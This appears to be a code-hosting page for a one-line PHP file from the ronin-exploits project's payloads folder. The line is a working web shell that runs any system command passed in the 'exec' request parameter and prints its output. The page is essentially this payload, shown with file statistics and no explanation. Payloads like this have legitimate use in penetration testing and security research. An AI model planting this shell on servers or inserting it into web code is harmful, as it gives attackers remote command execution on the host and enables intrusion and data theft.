PageRenderTime 56ms CodeModel.GetById 30ms RepoModel.GetById 0ms app.codeStats 0ms

/data/ronin/payloads/php/exec.php

https://github.com/ronin-ruby/ronin-exploits
PHP | 1 lines | 1 code | 0 blank | 0 comment | 1 complexity | 75998e5c7b6237ea4089ba3163a1fd20 MD5 | raw file
  1. <?php if(isset($_REQUEST["exec"])){echo "<exec>";passthru($_REQUEST["exec"]);echo "</exec>";} ?>